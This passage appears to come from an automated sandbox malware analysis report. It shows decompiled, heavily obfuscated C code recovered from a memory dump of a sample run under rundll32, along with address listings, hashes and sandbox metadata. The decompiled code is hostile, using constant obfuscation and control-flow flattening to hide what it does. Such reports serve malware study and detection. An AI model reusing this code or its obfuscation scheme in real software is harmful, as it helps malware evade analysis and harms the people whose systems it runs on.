				_v2828 = _v2828 << 2;
				_v2828 = _v2828 + 0x20c3;
				_v2828 = _v2828 ^ 0x0259597b;
				_v2764 = 0x91cc1a;
				_v2764 = _v2764 ^ 0x7e34b684;
				_v2764 = _v2764 / _t846;
				_v2764 = _v2764 ^ 0x0e161a93;
				_v2836 = 0xb2bb8f;
				_v2836 = _v2836 ^ 0xe08a2441;
				_v2836 = _v2836 << 9;
				_v2836 = _v2836 ^ 0x713d110f;
				_v2656 = 0xe40eab;
				_t847 = 0x44;
				_v2656 = _v2656 / _t847;
				_v2656 = _v2656 ^ 0x00028457;
				_v2848 = 0xe3c04;
				_t848 = 0x16;
				_v2848 = _v2848 * 0x5d;
				_v2848 = _v2848 + 0xc20e;
				_v2848 = _v2848 ^ 0x0525732a;
				_v2872 = 0x975bd1;
				_v2872 = _v2872 / _t848;
				_v2872 = _v2872 >> 1;
				_t849 = 0x62;
				_v2872 = _v2872 / _t849;
				_v2872 = _v2872 ^ 0x00094208;
				_v2852 = 0xde6f00;
				_v2852 = _v2852 + 0xdf6f;
				_t850 = 0x4c;
				_v2852 = _v2852 / _t850;
				_v2852 = _v2852 ^ 0x0009f2db;
				_v2796 = 0x43f736;
				_t851 = 0x53;
				_v2796 = _v2796 / _t851;
				_v2796 = _v2796 + 0x7bc9;
				_v2796 = _v2796 ^ 0x00042e34;
				_v2688 = 0xf8ab78;
				_t852 = 0x3c;
				_v2688 = _v2688 * 0x22;
				_v2688 = _v2688 ^ 0x21025542;
				_v2696 = 0x9e8755;
				_v2696 = _v2696 + 0xe3ef;
				_v2696 = _v2696 ^ 0x00960058;
				_v2792 = 0x415dac;
				_v2792 = _v2792 >> 1;
				_v2792 = _v2792 + 0xffffd338;
				_v2792 = _v2792 ^ 0x002ca457;
				_v2704 = 0xb8f6ce;
				_v2704 = _v2704 + 0xffff4ac5;
				_v2704 = _v2704 ^ 0x00b9d8ec;
				_v2860 = 0x12dd79;
				_v2860 = _v2860 ^ 0x144e403a;
				_v2860 = _v2860 / _t852;
				_v2860 = _v2860 ^ 0x93d5fcb7;
				_v2860 = _v2860 ^ 0x93828b4c;
				_v2868 = 0x481259;
				_v2868 = _v2868 ^ 0xea83c1db;
				_v2868 = _v2868 + 0xffff22f6;
				_v2868 = _v2868 | 0xf9bd7925;
				_v2868 = _v2868 ^ 0xfbfe4ce9;
				_v2740 = 0xefe715;
				_v2740 = _v2740 << 7;
				_v2740 = _v2740 >> 5;
				_v2740 = _v2740 ^ 0x03bc65a1;
				_v2748 = 0x39cd9f;
				_v2748 = _v2748 * 0x16;
				_v2748 = _v2748 + 0xefc3;
				_v2748 = _v2748 ^ 0x04f9debc;
				_t797 = E00358FD2(_t852);
				_t930 = _v2736;
				_t830 = _t797;
				while(1) {
					L1:
					_t798 = 0x7e670bc;
					do {
						while(1) {
							L2:
							_t945 = _t931 - 0x7d4716d;
							if(_t945 > 0) {
								break;
							}
							if(_t945 == 0) {
								_t858 = _v2848;
								E003468DE(_t858, _v2872, _v2852, _v2796, _t930);
								_t937 =  &(_t937[3]);
								_t931 = 0x97d4d6b;
								while(1) {
									L1:
									_t798 = 0x7e670bc;
									goto L2;
								}
							} else {
								if(_t931 == 0x9f9f0c) {
									_v2612 = E003613A6();
									_v2608 = 2 + E0035BA68(_v2716, _v2812, _v2660, _t808, _v2744) * 2;
									_t858 = _t830;
									_t812 = E00345EB5(_t858, _v2912, _t830, _v2752,  &_v2616, _v2700, _v2652, _v2804, _v2708, _t830, _v2716, _v2716, _v2636, _v2772);
									_t937 =  &(_t937[0xf]);
									__eflags = _t812;
									if(__eflags != 0) {
										_t931 = 0xaab8dea;
										while(1) {
											L1:
											_t798 = 0x7e670bc;
											goto L2;
										}
									}
								} else {
									if(_t931 == 0x1e136d2) {
										_push(_v2656);
										_push(_v2836);
										_push(_v2764);
										_push(0);
										_push(0);
										_push(_v2828);
										_push(_t858);
										_push(1);
										_t858 =  &_v1044;
										E00349700(_t858, _v2780, __eflags);
										_t937 =  &(_t937[8]);
										_t931 = 0x7d4716d;
										while(1) {
											L1:
											_t798 = 0x7e670bc;
											goto L2;
										}
									} else {
										if(_t931 == 0x2dbd64b) {
											return E00354DAD(_v2860, _v2868, _v2616, _v2740, _v2748);
										}
										if(_t931 == 0x63d9dbc) {
											_push(_t858);
											E0034EA7B( &_v524, _v2788, _v2888, _t858, _v2844, _v2920, _v2864);
											_t937 =  &(_t937[7]);
											_t931 = 0xc6ce6ce;
											while(1) {
												L1:
												_t798 = 0x7e670bc;
												goto L2;
											}
										} else {
											if(_t931 != 0x7253c5e) {
												goto L24;
											} else {
												_t858 = _v2760;
												_t930 = E0035C9A9(_v2928, _v2896, _v2624, _v2724, _v2620);
												_t937 =  &(_t937[4]);
												_t798 = 0x7e670bc;
												_t931 =  !=  ? 0x7e670bc : 0x97d4d6b;
												continue;
											}
										}
									}
									L28:
								}
							}
							L27:
							return _t812;
							goto L28;
						}
						__eflags = _t931 - _t798;
						if(__eflags == 0) {
							_push(_v2784);
							_push(_v2680);
							_push(0x34190c);
							E0035D37B(E0034AB66(_v2672, _v2776, __eflags), __eflags, _v2664, _t930, _v2672, _v2892,  &_v524,  &_v1044,  &_v2604, _v2768);
							E0034AE03(_v2736, _v2756, _v2876, _t799);
							_t937 =  &(_t937[0xd]);
							_t931 = 0x1e136d2;
							_t798 = 0x7e670bc;
							goto L24;
						} else {
							__eflags = _t931 - 0x97d4d6b;
							if(_t931 == 0x97d4d6b) {
								E003468DE(_v2688, _v2696, _v2792, _v2704, _v2624);
								_t937 =  &(_t937[3]);
								_t931 = 0x2dbd64b;
								goto L1;
							} else {
								__eflags = _t931 - 0xaab8dea;
								if(_t931 == 0xaab8dea) {
									E0034777B(_v2712,  &_v2624,  &_v2616, _v2800, _v2900, _v2720);
									_t937 =  &(_t937[4]);
									asm("sbb esi, esi");
									_t931 = (_t931 & 0x04496613) + 0x2dbd64b;
									while(1) {
										L1:
										_t798 = 0x7e670bc;
										goto L2;
									}
								} else {
									__eflags = _t931 - 0xc6ce6ce;
									if(__eflags != 0) {
										goto L24;
									} else {
										E003612A8(_t858, _v2628, __eflags, _v2880, _v2904,  &_v2084);
										 *((short*)(E00354FA8(_v2632,  &_v2084, _v2692, _v2840))) = 0;
										E00348650(_v2684,  &_v1564, __eflags, _v2832);
										_push(_v2640);
										_push(_v2676);
										_push(0x34181c);
										E0034E7CE(E0034AB66(_v2932, _v2940, __eflags), __eflags, _v2816,  &_v2084, _v2932, _v2644, _v2668, _v2824, _v2648,  &_v1564);
										E0034AE03(_v2916, _v2728, _v2924, _t825);
										_t858 = _v2856;
										_t812 = E0035C38F(_t858,  &_v2604, _t936, _v2908);
										_t937 =  &(_t937[0x15]);
										__eflags = _t812;
										if(__eflags != 0) {
											_t931 = 0x9f9f0c;
											while(1) {
												L1:
												_t798 = 0x7e670bc;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t931 - 0xd142a7e;
					} while (__eflags != 0);
					return _t798;
				}
			}



























































































































                                                                                                                      0x0034472e
                                                                                                                      0x00344734
                                                                                                                      0x0034473e
                                                                                                                      0x0034474f
                                                                                                                      0x00344753
                                                                                                                      0x0034475a
                                                                                                                      0x00344761
                                                                                                                      0x00344764
                                                                                                                      0x00344768
                                                                                                                      0x00344770
                                                                                                                      0x0034477b
                                                                                                                      0x00344783
                                                                                                                      0x0034478e
                                                                                                                      0x00344796
                                                                                                                      0x0034479e
                                                                                                                      0x003447a3
                                                                                                                      0x003447ab
                                                                                                                      0x003447b3
                                                                                                                      0x003447be
                                                                                                                      0x003447c6
                                                                                                                      0x003447d1
                                                                                                                      0x003447dc
                                                                                                                      0x003447e7
                                                                                                                      0x003447ef
                                                                                                                      0x003447fa
                                                                                                                      0x00344805
                                                                                                                      0x0034480d
                                                                                                                      0x00344815
                                                                                                                      0x0034481a
                                                                                                                      0x00344822
                                                                                                                      0x00344832
                                                                                                                      0x00344836
                                                                                                                      0x0034483b
                                                                                                                      0x00344843
                                                                                                                      0x0034484b
                                                                                                                      0x00344853
                                                                                                                      0x00344858
                                                                                                                      0x00344865
                                                                                                                      0x00344868
                                                                                                                      0x0034486c
                                                                                                                      0x00344874
                                                                                                                      0x0034488a
                                                                                                                      0x00344891
                                                                                                                      0x0034489c
                                                                                                                      0x003448a4
                                                                                                                      0x003448ad
                                                                                                                      0x003448b2
                                                                                                                      0x003448b8
                                                                                                                      0x003448c0
                                                                                                                      0x003448c8
                                                                                                                      0x003448d4
                                                                                                                      0x003448d7
                                                                                                                      0x003448db
                                                                                                                      0x003448e0
                                                                                                                      0x003448e8
                                                                                                                      0x003448f0
                                                                                                                      0x003448fb
                                                                                                                      0x00344906
                                                                                                                      0x00344911
                                                                                                                      0x0034491c
                                                                                                                      0x00344926
                                                                                                                      0x00344931
                                                                                                                      0x00344939
                                                                                                                      0x0034493e
                                                                                                                      0x00344943
                                                                                                                      0x0034494b
                                                                                                                      0x00344956
                                                                                                                      0x00344961
                                                                                                                      0x0034496c
                                                                                                                      0x0034497b
                                                                                                                      0x0034497e
                                                                                                                      0x00344985
                                                                                                                      0x00344990
                                                                                                                      0x0034499b
                                                                                                                      0x003449a3
                                                                                                                      0x003449a8
                                                                                                                      0x003449b0
                                                                                                                      0x003449b8
                                                                                                                      0x003449c0
                                                                                                                      0x003449c8
                                                                                                                      0x003449d0
                                                                                                                      0x003449d5
                                                                                                                      0x003449dd
                                                                                                                      0x003449e5
                                                                                                                      0x003449f0
                                                                                                                      0x003449f8
                                                                                                                      0x00344a03
                                                                                                                      0x00344a16
                                                                                                                      0x00344a1d
                                                                                                                      0x00344a28
                                                                                                                      0x00344a33
                                                                                                                      0x00344a3e
                                                                                                                      0x00344a49
                                                                                                                      0x00344a54
                                                                                                                      0x00344a5f
                                                                                                                      0x00344a67
                                                                                                                      0x00344a72
                                                                                                                      0x00344a7d
                                                                                                                      0x00344a88
                                                                                                                      0x00344a93
                                                                                                                      0x00344a9e
                                                                                                                      0x00344aa9
                                                                                                                      0x00344ab4
                                                                                                                      0x00344abf
                                                                                                                      0x00344ad2
                                                                                                                      0x00344ad9
                                                                                                                      0x00344ae4
                                                                                                                      0x00344aec
                                                                                                                      0x00344af9
                                                                                                                      0x00344b02
                                                                                                                      0x00344b03
                                                                                                                      0x00344b07
                                                                                                                      0x00344b0f
                                                                                                                      0x00344b1a
                                                                                                                      0x00344b22
                                                                                                                      0x00344b2d
                                                                                                                      0x00344b3a
                                                                                                                      0x00344b3e
                                                                                                                      0x00344b43
                                                                                                                      0x00344b4b
                                                                                                                      0x00344b53
                                                                                                                      0x00344b61
                                                                                                                      0x00344b65
                                                                                                                      0x00344b6d
                                                                                                                      0x00344b75
                                                                                                                      0x00344b7d
                                                                                                                      0x00344b82
                                                                                                                      0x00344b8a
                                                                                                                      0x00344b94
                                                                                                                      0x00344b9c
                                                                                                                      0x00344bb0
                                                                                                                      0x00344bb5
                                                                                                                      0x00344bbc
                                                                                                                      0x00344bc7
                                                                                                                      0x00344bdc
                                                                                                                      0x00344bee
                                                                                                                      0x00344bf5
                                                                                                                      0x00344c00
                                                                                                                      0x00344c0b
                                                                                                                      0x00344c12
                                                                                                                      0x00344c1d
                                                                                                                      0x00344c2f
                                                                                                                      0x00344c34
                                                                                                                      0x00344c3d
                                                                                                                      0x00344c48
                                                                                                                      0x00344c53
                                                                                                                      0x00344c65
                                                                                                                      0x00344c68
                                                                                                                      0x00344c6f
                                                                                                                      0x00344c7a
                                                                                                                      0x00344c85
                                                                                                                      0x00344c90
                                                                                                                      0x00344c98
                                                                                                                      0x00344ca3
                                                                                                                      0x00344cab
                                                                                                                      0x00344cb0
                                                                                                                      0x00344cb8
                                                                                                                      0x00344cc0
                                                                                                                      0x00344cc8
                                                                                                                      0x00344cdb
                                                                                                                      0x00344cea
                                                                                                                      0x00344cf1
                                                                                                                      0x00344cfc
                                                                                                                      0x00344d0f
                                                                                                                      0x00344d16
                                                                                                                      0x00344d21
                                                                                                                      0x00344d2c
                                                                                                                      0x00344d34
                                                                                                                      0x00344d3c
                                                                                                                      0x00344d47
                                                                                                                      0x00344d52
                                                                                                                      0x00344d5d
                                                                                                                      0x00344d68
                                                                                                                      0x00344d73
                                                                                                                      0x00344d7e
                                                                                                                      0x00344d89
                                                                                                                      0x00344d94
                                                                                                                      0x00344d9f
                                                                                                                      0x00344daa
                                                                                                                      0x00344db5
                                                                                                                      0x00344dc0
                                                                                                                      0x00344dcb
                                                                                                                      0x00344dd6
                                                                                                                      0x00344dde
                                                                                                                      0x00344de6
                                                                                                                      0x00344df1
                                                                                                                      0x00344df9
                                                                                                                      0x00344e06
                                                                                                                      0x00344e0b
                                                                                                                      0x00344e11
                                                                                                                      0x00344e19
                                                                                                                      0x00344e21
                                                                                                                      0x00344e2c
                                                                                                                      0x00344e34
                                                                                                                      0x00344e3f
                                                                                                                      0x00344e4a
                                                                                                                      0x00344e5c
                                                                                                                      0x00344e61
                                                                                                                      0x00344e6a
                                                                                                                      0x00344e75
                                                                                                                      0x00344e7d
                                                                                                                      0x00344e86
                                                                                                                      0x00344e8b
                                                                                                                      0x00344e96
                                                                                                                      0x00344e97
                                                                                                                      0x00344e9b
                                                                                                                      0x00344ea3
                                                                                                                      0x00344eab
                                                                                                                      0x00344eb3
                                                                                                                      0x00344ebb
                                                                                                                      0x00344ec3
                                                                                                                      0x00344ecb
                                                                                                                      0x00344ed6
                                                                                                                      0x00344ee1
                                                                                                                      0x00344eec
                                                                                                                      0x00344ef7
                                                                                                                      0x00344f02
                                                                                                                      0x00344f0d
                                                                                                                      0x00344f20
                                                                                                                      0x00344f27
                                                                                                                      0x00344f32
                                                                                                                      0x00344f3d
                                                                                                                      0x00344f48
                                                                                                                      0x00344f53
                                                                                                                      0x00344f5e
                                                                                                                      0x00344f72
                                                                                                                      0x00344f79
                                                                                                                      0x00344f84
                                                                                                                      0x00344f8f
                                                                                                                      0x00344f97
                                                                                                                      0x00344f9c
                                                                                                                      0x00344fa1
                                                                                                                      0x00344fa9
                                                                                                                      0x00344fb1
                                                                                                                      0x00344fbc
                                                                                                                      0x00344fc7
                                                                                                                      0x00344fd2
                                                                                                                      0x00344fdf
                                                                                                                      0x00344fe8
                                                                                                                      0x00344fec
                                                                                                                      0x00344ff4
                                                                                                                      0x00344ffc
                                                                                                                      0x0034500f
                                                                                                                      0x0034501e
                                                                                                                      0x00345025
                                                                                                                      0x00345030
                                                                                                                      0x0034503b
                                                                                                                      0x00345046
                                                                                                                      0x00345051
                                                                                                                      0x0034505e
                                                                                                                      0x00345072
                                                                                                                      0x00345077
                                                                                                                      0x00345080
                                                                                                                      0x0034508b
                                                                                                                      0x00345093
                                                                                                                      0x0034509b
                                                                                                                      0x003450a8
                                                                                                                      0x003450ab
                                                                                                                      0x003450af
                                                                                                                      0x003450b7
                                                                                                                      0x003450c2
                                                                                                                      0x003450cd
                                                                                                                      0x003450d8
                                                                                                                      0x003450e3
                                                                                                                      0x003450ee
                                                                                                                      0x003450f6
                                                                                                                      0x00345101
                                                                                                                      0x0034510c
                                                                                                                      0x00345117
                                                                                                                      0x0034512d
                                                                                                                      0x00345134
                                                                                                                      0x0034513f
                                                                                                                      0x00345147
                                                                                                                      0x0034514f
                                                                                                                      0x00345154
                                                                                                                      0x0034515c
                                                                                                                      0x0034516e
                                                                                                                      0x00345173
                                                                                                                      0x0034517c
                                                                                                                      0x00345187
                                                                                                                      0x00345194
                                                                                                                      0x00345197
                                                                                                                      0x0034519b
                                                                                                                      0x003451a3
                                                                                                                      0x003451ab
                                                                                                                      0x003451bb
                                                                                                                      0x003451bf
                                                                                                                      0x003451c7
                                                                                                                      0x003451cc
                                                                                                                      0x003451d2
                                                                                                                      0x003451da
                                                                                                                      0x003451e2
                                                                                                                      0x003451ee
                                                                                                                      0x003451f3
                                                                                                                      0x003451f9
                                                                                                                      0x00345201
                                                                                                                      0x00345213
                                                                                                                      0x00345216
                                                                                                                      0x0034521d
                                                                                                                      0x00345228
                                                                                                                      0x00345235
                                                                                                                      0x0034524a
                                                                                                                      0x0034524b
                                                                                                                      0x00345252
                                                                                                                      0x0034525d
                                                                                                                      0x00345268
                                                                                                                      0x00345273
                                                                                                                      0x0034527e
                                                                                                                      0x00345289
                                                                                                                      0x00345290
                                                                                                                      0x0034529b
                                                                                                                      0x003452a6
                                                                                                                      0x003452b1
                                                                                                                      0x003452bc
                                                                                                                      0x003452c7
                                                                                                                      0x003452cf
                                                                                                                      0x003452dd
                                                                                                                      0x003452e1
                                                                                                                      0x003452e9
                                                                                                                      0x003452f1
                                                                                                                      0x003452f9
                                                                                                                      0x00345301
                                                                                                                      0x00345309
                                                                                                                      0x00345311
                                                                                                                      0x00345319
                                                                                                                      0x00345324
                                                                                                                      0x0034532c
                                                                                                                      0x00345334
                                                                                                                      0x0034533f
                                                                                                                      0x00345352
                                                                                                                      0x00345359
                                                                                                                      0x00345364
                                                                                                                      0x0034537a
                                                                                                                      0x0034537f
                                                                                                                      0x00345386
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x0034538d
                                                                                                                      0x0034538d
                                                                                                                      0x0034538d
                                                                                                                      0x0034538d
                                                                                                                      0x00345393
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00345399
                                                                                                                      0x00345545
                                                                                                                      0x00345549
                                                                                                                      0x0034554e
                                                                                                                      0x00345551
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x0034539f
                                                                                                                      0x003453a5
                                                                                                                      0x003454a5
                                                                                                                      0x003454d8
                                                                                                                      0x003454f7
                                                                                                                      0x0034551b
                                                                                                                      0x00345520
                                                                                                                      0x00345523
                                                                                                                      0x00345525
                                                                                                                      0x0034552b
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x003453ab
                                                                                                                      0x003453b1
                                                                                                                      0x0034544b
                                                                                                                      0x00345452
                                                                                                                      0x00345456
                                                                                                                      0x0034545d
                                                                                                                      0x0034545f
                                                                                                                      0x00345461
                                                                                                                      0x0034546f
                                                                                                                      0x00345470
                                                                                                                      0x00345472
                                                                                                                      0x00345479
                                                                                                                      0x0034547e
                                                                                                                      0x00345481
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x003453b7
                                                                                                                      0x003453bd
                                                                                                                      0x00000000
                                                                                                                      0x003457c0
                                                                                                                      0x003453c9
                                                                                                                      0x00345419
                                                                                                                      0x00345439
                                                                                                                      0x0034543e
                                                                                                                      0x00345441
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x003453cb
                                                                                                                      0x003453d1
                                                                                                                      0x00000000
                                                                                                                      0x003453d7
                                                                                                                      0x003453f4
                                                                                                                      0x00345400
                                                                                                                      0x00345402
                                                                                                                      0x0034540c
                                                                                                                      0x00345411
                                                                                                                      0x00000000
                                                                                                                      0x00345411
                                                                                                                      0x003453d1
                                                                                                                      0x003453c9
                                                                                                                      0x00000000
                                                                                                                      0x003453b1
                                                                                                                      0x003453a5
                                                                                                                      0x003457cd
                                                                                                                      0x003457cd
                                                                                                                      0x00000000
                                                                                                                      0x003457cd
                                                                                                                      0x0034555b
                                                                                                                      0x0034555d
                                                                                                                      0x00345709
                                                                                                                      0x00345710
                                                                                                                      0x00345725
                                                                                                                      0x00345766
                                                                                                                      0x0034577e
                                                                                                                      0x00345783
                                                                                                                      0x00345786
                                                                                                                      0x0034578b
                                                                                                                      0x00000000
                                                                                                                      0x00345563
                                                                                                                      0x00345563
                                                                                                                      0x00345569
                                                                                                                      0x003456f7
                                                                                                                      0x003456fc
                                                                                                                      0x003456ff
                                                                                                                      0x00000000
                                                                                                                      0x0034556f
                                                                                                                      0x0034556f
                                                                                                                      0x00345575
                                                                                                                      0x003456b7
                                                                                                                      0x003456bc
                                                                                                                      0x003456c1
                                                                                                                      0x003456c9
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x0034557b
                                                                                                                      0x0034557b
                                                                                                                      0x00345581
                                                                                                                      0x00000000
                                                                                                                      0x00345587
                                                                                                                      0x0034559e
                                                                                                                      0x003455d4
                                                                                                                      0x003455de
                                                                                                                      0x003455e6
                                                                                                                      0x003455ed
                                                                                                                      0x003455fc
                                                                                                                      0x00345648
                                                                                                                      0x0034565d
                                                                                                                      0x00345666
                                                                                                                      0x00345675
                                                                                                                      0x0034567a
                                                                                                                      0x0034567d
                                                                                                                      0x0034567f
                                                                                                                      0x00345685
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x0034567f
                                                                                                                      0x00345581
                                                                                                                      0x00345575
                                                                                                                      0x00345569
                                                                                                                      0x00000000
                                                                                                                      0x00345790
                                                                                                                      0x00345790
                                                                                                                      0x00345790
                                                                                                                      0x00000000
                                                                                                                      0x0034538d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &Xbm$'X$04$6R$KO!$X$kM}$kM}$kM}$w3
                                                                                                                      • API String ID: 0-3270913840
                                                                                                                      • Opcode ID: 5fe1672b4227ec2c1b300239f9aae8c06c23ba7808152ad32d1b26446d23a4b4
                                                                                                                      • Instruction ID: 4a81ea4931feedc0985e3b667cbb77944eb7de9ab74a07784e1a20c827252707
                                                                                                                      • Opcode Fuzzy Hash: 5fe1672b4227ec2c1b300239f9aae8c06c23ba7808152ad32d1b26446d23a4b4
                                                                                                                      • Instruction Fuzzy Hash: 8F82FE71509380DBD379CF61C98AB9BBBE2BBC4308F10891DE5999A260D7B59948CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00351831 Relevance: 13.1, Strings: 10, Instructions: 639COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E00351831(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				void* __ecx;
				void* _t670;
				void* _t736;
				void* _t738;
				void* _t739;
				intOrPtr _t745;
				void* _t746;
				void* _t749;
				void* _t759;
				void* _t765;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				void* _t789;
				void* _t859;
				signed int _t876;
				void* _t877;
				signed int _t879;
				void* _t880;
				void* _t883;
				void* _t884;
				void* _t885;
				void* _t891;

				_push(_a24);
				_push(_a20);
				_push(0x20);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0034CF25(_t670);
				_v276 = 0xaaffe7;
				_t885 = _t884 + 0x20;
				_t883 = 0;
				_t765 = 0x92c7fbc;
				_t772 = 0x5f;
				_v276 = _v276 * 0x57;
				_v276 = _v276 * 0x22;
				_v276 = _v276 / _t772;
				_v276 = _v276 ^ 0x01ef6b71;
				_v80 = 0xefa32d;
				_v80 = _v80 + 0x395c;
				_v80 = _v80 ^ 0x00efdc89;
				_v208 = 0x14a646;
				_v208 = _v208 ^ 0x03e947f6;
				_t773 = 0x33;
				_v208 = _v208 * 7;
				_v208 = _v208 >> 7;
				_v208 = _v208 ^ 0x0037e257;
				_v108 = 0x55608a;
				_v108 = _v108 ^ 0x27d6d008;
				_v108 = _v108 + 0x510f;
				_v108 = _v108 ^ 0x27840191;
				_v224 = 0xd82d5c;
				_v224 = _v224 | 0x75fffbda;
				_v224 = _v224 + 0xb67d;
				_v224 = _v224 ^ 0x7600b65b;
				_v248 = 0x5f7a1e;
				_v248 = _v248 << 2;
				_v248 = _v248 / _t773;
				_v248 = _v248 << 0xc;
				_v248 = _v248 ^ 0x77d07000;
				_v28 = 0xb2098a;
				_v28 = _v28 ^ 0xa6106b4f;
				_v28 = _v28 ^ 0xa6a262c5;
				_v288 = 0xdf0886;
				_v288 = _v288 ^ 0xb20bba38;
				_v288 = _v288 + 0xffff058c;
				_t774 = 0x55;
				_v288 = _v288 / _t774;
				_v288 = _v288 ^ 0x021a95be;
				_v40 = 0x709b38;
				_v40 = _v40 * 0x4c;
				_v40 = _v40 ^ 0x216e14a0;
				_v128 = 0x325f64;
				_v128 = _v128 | 0xcbf69bed;
				_v128 = _v128 ^ 0x5f1c2ec7;
				_v128 = _v128 ^ 0x94eaf12a;
				_v252 = 0x1f8c2d;
				_v252 = _v252 * 0x26;
				_v252 = _v252 << 9;
				_v252 = _v252 | 0x352a9659;
				_v252 = _v252 ^ 0x7dbfde59;
				_v52 = 0xb64530;
				_v52 = _v52 + 0xffff220f;
				_v52 = _v52 ^ 0x00b5673f;
				_v88 = 0x1eb517;
				_v88 = _v88 + 0x4a10;
				_v88 = _v88 ^ 0x00179ba4;
				_v152 = 0x6dcdd2;
				_v152 = _v152 >> 0xd;
				_v152 = _v152 ^ 0x9b988486;
				_v152 = _v152 ^ 0x9b92820d;
				_v292 = 0x1f7420;
				_v292 = _v292 + 0xffff8acf;
				_v292 = _v292 + 0xbea;
				_v292 = _v292 << 0x10;
				_v292 = _v292 ^ 0x0ad85b60;
				_v96 = 0xe183f;
				_v96 = _v96 + 0xffffe0b5;
				_v96 = _v96 ^ 0x0006a2b5;
				_v168 = 0xbc531d;
				_v168 = _v168 + 0x1044;
				_v168 = _v168 << 8;
				_v168 = _v168 ^ 0xbc6aad42;
				_v48 = 0xac758b;
				_t775 = 0xa;
				_v48 = _v48 * 0x77;
				_v48 = _v48 ^ 0x5023fd0d;
				_v236 = 0x67d513;
				_v236 = _v236 / _t775;
				_v236 = _v236 | 0x579eaf6c;
				_v236 = _v236 ^ 0x8e50ee8d;
				_v236 = _v236 ^ 0xd9c1be3e;
				_v136 = 0xfa6994;
				_v136 = _v136 | 0x0e19192c;
				_v136 = _v136 >> 8;
				_v136 = _v136 ^ 0x000b81a6;
				_v104 = 0xfa7815;
				_v104 = _v104 + 0xfffffd57;
				_v104 = _v104 | 0xf8b7ad9b;
				_v104 = _v104 ^ 0xf8f20afa;
				_v196 = 0x8e2a42;
				_t776 = 0x1d;
				_v196 = _v196 / _t776;
				_v196 = _v196 + 0xffff8133;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x00494cf1;
				_v284 = 0x1a2960;
				_v284 = _v284 << 7;
				_v284 = _v284 << 1;
				_t777 = 0x7a;
				_v284 = _v284 / _t777;
				_v284 = _v284 ^ 0x00394215;
				_v268 = 0x43d89f;
				_v268 = _v268 + 0xffff7f02;
				_v268 = _v268 * 0x63;
				_v268 = _v268 ^ 0x1173969c;
				_v268 = _v268 ^ 0x0b729cb1;
				_v228 = 0xa5ecf3;
				_v228 = _v228 >> 0xd;
				_v228 = _v228 + 0xffff2d40;
				_v228 = _v228 + 0xffff09c3;
				_v228 = _v228 ^ 0xfffc6095;
				_v160 = 0xb4fa1d;
				_v160 = _v160 * 0x4b;
				_v160 = _v160 >> 0xa;
				_v160 = _v160 ^ 0x0003d5ef;
				_v36 = 0xfd760e;
				_v36 = _v36 | 0xcf12de5e;
				_v36 = _v36 ^ 0xcff8d2d3;
				_v260 = 0x7426f9;
				_v260 = _v260 + 0x2744;
				_v260 = _v260 | 0xa7f1812e;
